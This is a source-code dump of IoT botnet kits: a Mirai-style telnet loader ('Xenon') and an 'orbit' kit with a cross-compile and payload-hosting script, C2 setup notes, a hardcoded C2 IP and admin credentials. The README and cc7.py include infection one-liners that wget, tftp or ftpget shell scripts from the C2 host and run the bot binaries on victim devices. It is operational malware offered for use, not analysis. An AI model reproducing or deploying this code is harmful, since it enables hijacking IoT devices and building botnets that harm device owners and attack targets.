52 | while(TRUE) 53 | { 54 | char strbuf[1024]; 55 | 56 | if(fgets(strbuf, sizeof(strbuf), stdin) == NULL) 57 | break; 58 | 59 | util_trim(strbuf); 60 | 61 | if(strlen(strbuf) == 0) 62 | { 63 | usleep(10000); 64 | continue; 65 | } 66 | 67 | memset(&info, 0, sizeof(struct telnet_info)); 68 | if(telnet_info_parse(strbuf, &info) == NULL) 69 | { 70 | //printf("Failed to parse telnet info: \"%s\" Format -> ip:port user:pass arch\n", strbuf); 71 | } 72 | else 73 | { 74 | if(srv == NULL) 75 | { 76 | //printf("srv == NULL 2\n"); 77 | } 78 | 79 | server_queue_telnet(srv, &info); 80 | if(total++ % 1000 == 0) sleep(1); 81 | } 82 | 83 | ATOMIC_INC(&srv->total_input); 84 | } 85 | 86 | //printf("Hit end of input.\n"); 87 | 88 | while(ATOMIC_GET(&srv->curr_open) > 0) sleep(1); 89 | 90 | return 0; 91 | } 92 | 93 | static void *stats_thread(void *arg) 94 | { 95 | uint32_t seconds = 0; 96 | 97 | while(TRUE) 98 | { 99 | #ifndef DEBUG 100 | printf("\e[97m%ds \e[97m| Conns \e[96m%d \e[97m| Ran \e[92m%d \e[97m| Echoes \e[91m%d \e[97m| Wgets \e[95m%d \e[97m| TFTPs \e[93m%d \e[91m(FAILS = %d)\r\n", 101 | seconds++, ATOMIC_GET(&srv->curr_open), ATOMIC_GET(&srv->total_logins), ATOMIC_GET(&srv->total_successes), 102 | ATOMIC_GET(&srv->total_echoes), ATOMIC_GET(&srv->total_wgets), ATOMIC_GET(&srv->total_tftps)); 103 | #endif 104 | fflush(stdout); 105 | sleep(1); 106 | } 107 | } 108 | -------------------------------------------------------------------------------- /Xenon/loader/src/telnet_info.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "headers/includes.h" 7 | #include "headers/telnet_info.h" 8 | 9 | struct telnet_info *telnet_info_new(char *user, char *pass, char *arch, ipv4_t addr, port_t port, struct telnet_info *info) 10 | { 11 | if(user != NULL) 12 | strcpy(info->user, user); 13 | if(pass != NULL) 14 | strcpy(info->pass, pass); 15 | if(arch != NULL) 16 | strcpy(info->arch, arch); 17 | info->addr = addr; 18 | info->port = port; 19 | 20 | info->has_auth = user != NULL || pass != NULL; 21 | info->has_arch = arch != NULL; 22 | 23 | return info; 24 | } 25 | 26 | struct telnet_info *telnet_info_parse(char *str, struct telnet_info *out) // Format: ip:port user:pass arch 27 | { 28 | char *conn, *auth, *arch; 29 | char *addr_str, *port_str, *user = NULL, *pass = NULL; 30 | ipv4_t addr; 31 | port_t port; 32 | 33 | if((conn = strtok(str, " ")) == NULL) 34 | return NULL; 35 | if((auth = strtok(NULL, " ")) == NULL) 36 | return NULL; 37 | arch = strtok(NULL, " "); // We don't care ifwe don't know the arch 38 | 39 | if((addr_str = strtok(conn, ":")) == NULL) 40 | return NULL; 41 | if((port_str = strtok(NULL, ":")) == NULL) 42 | return NULL; 43 | 44 | if(strlen(auth) == 1) 45 | { 46 | if(auth[0] == ':') 47 | { 48 | user = ""; 49 | pass = ""; 50 | } 51 | else if(auth[0] != '?') 52 | return NULL; 53 | } 54 | else 55 | { 56 | user = strtok(auth, ":"); 57 | pass = strtok(NULL, ":"); 58 | } 59 | 60 | addr = inet_addr(addr_str); 61 | port = htons(atoi(port_str)); 62 | 63 | return telnet_info_new(user, pass, arch, addr, port, out); 64 | } 65 | -------------------------------------------------------------------------------- /Xenon/loader/src/util.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "headers/includes.h" 10 | #include "headers/util.h" 11 | #include "headers/server.h" 12 | 13 | int util_socket_and_bind(struct server *srv) 14 | { 15 | struct sockaddr_in bind_addr; 16 | int i = 0, fd = 0, start_addr = 0; 17 | BOOL bound = FALSE; 18 | 19 | if((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) 20 | return -1; 21 | 22 | bind_addr.sin_family = AF_INET; 23 | bind_addr.sin_port = 0; 24 | 25 | start_addr = rand() % srv->bind_addrs_len; 26 | for(i = 0; i < srv->bind_addrs_len; i++) 27 | { 28 | bind_addr.sin_addr.s_addr = srv->bind_addrs[start_addr]; 29 | if(bind(fd, (struct sockaddr *)&bind_addr, sizeof(struct sockaddr_in)) == -1) 30 | { 31 | if(++start_addr == srv->bind_addrs_len) 32 | start_addr = 0; 33 | } 34 | else 35 | { 36 | bound = TRUE; 37 | break; 38 | } 39 | } 40 | if(!bound) 41 | { 42 | close(fd); 43 | #ifdef DEBUG 44 | printf("Failed to bind on any address\n"); 45 | #endif 46 | return -1; 47 | } 48 | 49 | if(fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK) == -1) 50 | { 51 | #ifdef DEBUG 52 | printf("Failed to set socket in nonblocking mode. This will have SERIOUS performance implications\n"); 53 | #endif 54 | } 55 | 56 | return fd; 57 | } 58 | 59 | int util_memsearch(char *buf, int buf_len, char *mem, int mem_len) 60 | { 61 | int i = 0, matched = 0; 62 | 63 | if(mem_len > buf_len) 64 | return -1; 65 | 66 | for(i = 0; i < buf_len; i++) 67 | { 68 | if(buf[i] == mem[matched]) 69 | { 70 | if(++matched == mem_len) 71 | { 72 | return i + 1; 73 | } 74 | } 75 | else 76 | matched = 0; 77 | } 78 | 79 | return -1; 80 | } 81 | 82 | BOOL util_sockprintf(int fd, const char *fmt, ...) 83 | { 84 | char buffer[BUFFER_SIZE + 2]; 85 | va_list args; 86 | int len = 0; 87 | 88 | va_start(args, fmt); 89 | len = vsnprintf(buffer, BUFFER_SIZE, fmt, args); 90 | va_end(args); 91 | 92 | if(len > 0) 93 | { 94 | if(len > BUFFER_SIZE) 95 | len = BUFFER_SIZE; 96 | 97 | #ifdef DEBUG 98 | printf("writing %s", buffer); 99 | #endif 100 | 101 | if(send(fd, buffer, len, MSG_NOSIGNAL) != len) 102 | return FALSE; 103 | } 104 | 105 | return TRUE; 106 | } 107 | 108 | char *util_trim(char *str) 109 | { 110 | char *end; 111 | 112 | while(isspace(*str)) 113 | str++; 114 | 115 | if(*str == 0) 116 | return str; 117 | 118 | end = str + strlen(str) - 1; 119 | while(end > str && isspace(*end)) 120 | end--; 121 | 122 | *(end+1) = 0; 123 | 124 | return str; 125 | } 126 | -------------------------------------------------------------------------------- /orbit/READ ME.txt: -------------------------------------------------------------------------------- 1 | yum update -y 2 | 3 | yum install python python-paramiko gcc nano nc screen psmisc bzip2 wget -y 4 | 5 | gcc server.c -o cnc -pthread 6 | 7 | nano orbit.txt 8 | 9 | python cc7.py client.c 134.122.28.1 10 | 11 | iptables -F 12 | 13 | screen ./cnc 8899 1 666 14 | 134.122.28.1 15 | 16 | 17 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://134.122.28.1/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 134.122.28.1 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 134.122.28.1; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 134.122.28.1 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh 18 | 19 | 20 | -------------------------------------------------------------------------------- /orbit/cc7.py: -------------------------------------------------------------------------------- 1 | 2 | import subprocess, urllib2, sys 3 | 4 | if len(sys.argv[2]) != 0: 5 | ip = sys.argv[2] 6 | else: 7 | print("\x1b[0;31mIncorrect Usage!") 8 | print("\x1b[0;32mUsage: python " + sys.argv[0] + " \x1b[0m") 9 | exit(1) 10 | 11 | bot = sys.argv[1] 12 | 13 | yourafag = raw_input("Get Arch's? Y/n:") 14 | if yourafag.lower() == "y": 15 | get_assailant = True 16 | else: 17 | get_assailant = False 18 | 19 | compileas = ["assailant.mips", #mips 20 | "assailant.mpsl", #mipsel 21 | "assailant.sh4", #sh4 22 | "assailant.x86", #x86 23 | "assailant.arm6", #Armv6l 24 | "assailant.i686", #i686 25 | "assailant.ppc", #ppc 26 | "assailant.i586", #i586 27 | "assailant.m68k", #m68k 28 | "assailant.sparc", #sparc 29 | "assailant.arm4", #arm4 30 | "assailant.arm5", #arm5 31 | "assailant.arm7", #arm7 32 | "assailant.ppc440fp"] #ppc440fp 33 | 34 | getassailant = ['http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2', 35 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2', 36 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2', 37 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2', 38 | 'http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2', 39 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2', 40 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2', 41 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2', 42 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2', 43 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2', 44 | 'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2', 45 | 'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2', 46 | 'https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2', 47 | 'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc-440fp.tar.bz2'] 48 | 49 | ccs = ["cross-compiler-mips", 50 | "cross-compiler-mipsel", 51 | "cross-compiler-sh4", 52 | "cross-compiler-x86_64", 53 | "cross-compiler-armv6l", 54 | "cross-compiler-i686", 55 | "cross-compiler-powerpc", 56 | "cross-compiler-i586", 57 | "cross-compiler-m68k", 58 | "cross-compiler-sparc", 59 | "cross-compiler-armv4l", 60 | "cross-compiler-armv5l", 61 | "cross-compiler-armv7l", 62 | "cross-compiler-powerpc-440fp"] 63 | 64 | def run(cmd): 65 | subprocess.call(cmd, shell=True) 66 | 67 | run("rm -rf /var/www/html/* /var/lib/tftpboot/* /var/ftp/*") 68 | 69 | if get_assailant == True: 70 | run("rm -rf cross-compiler-*") 71 | 72 | print("Downloading assailantitectures") 73 | 74 | for assailant in getassailant: 75 | run("wget " + assailant + " --no-check-certificate >> /dev/null") 76 | run("tar -xvf *tar.bz2") 77 | run("rm -rf *tar.bz2") 78 | 79 | print("Cross Compilers Downloaded...") 80 | 81 | num = 0 82 | for cc in ccs: 83 | assailant = cc.split("-")[2] 84 | run("./"+cc+"/bin/"+assailant+"-gcc -static -pthread -D" + assailant.upper() + " -o " + compileas[num] + " " + bot + " > /dev/null") 85 | num += 1 86 | 87 | print("Cross Compiling Done!") 88 | print("Setting up your httpd and tftp") 89 | 90 | run("yum install httpd -y") 91 | run("service httpd start") 92 | run("yum install xinetd tftp tftp-server -y") 93 | run("yum install vsftpd -y") 94 | run("service vsftpd start") 95 | 96 | run('''echo -e "# default: off 97 | # description: The tftp server serves files using the trivial file transfer \ 98 | # protocol. The tftp protocol is often used to boot diskless \ 99 | # workstations, download configuration files to network-aware printers, \ 100 | # and to start the installation process for some operating systems. 101 | service tftp 102 | { 103 | socket_type = dgram 104 | protocol = udp 105 | wait = yes 106 | user = root 107 | server = /usr/sbin/in.tftpd 108 | server_args = -s -c /var/lib/tftpboot 109 | disable = no 110 | per_source = 11 111 | cps = 100 2 112 | flags = IPv4 113 | } 114 | " > /etc/xinetd.d/tftp''') 115 | run("service xinetd start") 116 | 117 | run('''echo -e "listen=YES 118 | local_enable=NO 119 | anonymous_enable=YES 120 | write_enable=NO 121 | anon_root=/var/ftp 122 | anon_max_rate=2048000 123 | xferlog_enable=YES 124 | listen_address='''+ ip +''' 125 | listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''') 126 | run("service vsftpd restart") 127 | for i in compileas: 128 | run("cp " + i + " /var/www/html") 129 | run("cp " + i + " /var/ftp") 130 | run("mv " + i + " /var/lib/tftpboot") 131 | 132 | run('echo -e "#!/bin/bash" > /var/lib/tftpboot/tftp1.sh') 133 | 134 | run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/tftp1.sh') 135 | 136 | run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tftp1.sh') 137 | 138 | run('echo -e "#!/bin/bash" > /var/lib/tftpboot/tftp2.sh') 139 | 140 | run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/tftp2.sh') 141 | 142 | run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tftp2.sh') 143 | 144 | run('echo -e "#!/bin/bash" > /var/www/html/bins.sh') 145 | 146 | for i in compileas: 147 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/' + i + '; chmod +x ' + i + '; ./' + i + '; rm -rf ' + i + '" >> /var/www/html/bins.sh') 148 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' ' + i + ' ' + i + '; chmod +x ' + i + ' ./' + i + '; rm -rf ' + i + '" >> /var/ftp/ftp1.sh') 149 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get ' + i + ';cat ' + i + ' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/tftp1.sh') 150 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r ' + i + ' -g ' + ip + ';cat ' + i + ' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/tftp2.sh') 151 | 152 | run("service xinetd restart") 153 | run("service httpd restart") 154 | run('echo -e "ulimit -n 99999" >> ~/.bashrc') 155 | 156 | print("\x1b[0;32mcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/bins.sh; chmod +x bins.sh; sh bins.sh; tftp " + ip + " -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g " + ip + "; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 " + ip + " ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh\x1b[0m") 157 | print -------------------------------------------------------------------------------- /orbit/orbit.txt: -------------------------------------------------------------------------------- 1 | Admin !ThotPatrol! admin -------------------------------------------------------------------------------- /orbit/resolver.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | //part of orbit by @10gbps 17 | int resolve(char * , char *); 18 | int resolve(char * site , char* ip) 19 | { 20 | struct hostent *he; 21 | struct in_addr **addr_list; 22 | int i; 23 | 24 | if ( (he = gethostbyname( site ) ) == NULL) 25 | { 26 | herror("gethostbyname"); 27 | return 1; 28 | } 29 | 30 | addr_list = (struct in_addr **) he->h_addr_list; 31 | 32 | for(i = 0; addr_list[i] != NULL; i++) 33 | { 34 | strcpy(ip , inet_ntoa(*addr_list[i]) ); 35 | return 0; 36 | } 37 | 38 | return 1; 39 | } --------------------------------------------------------------------------------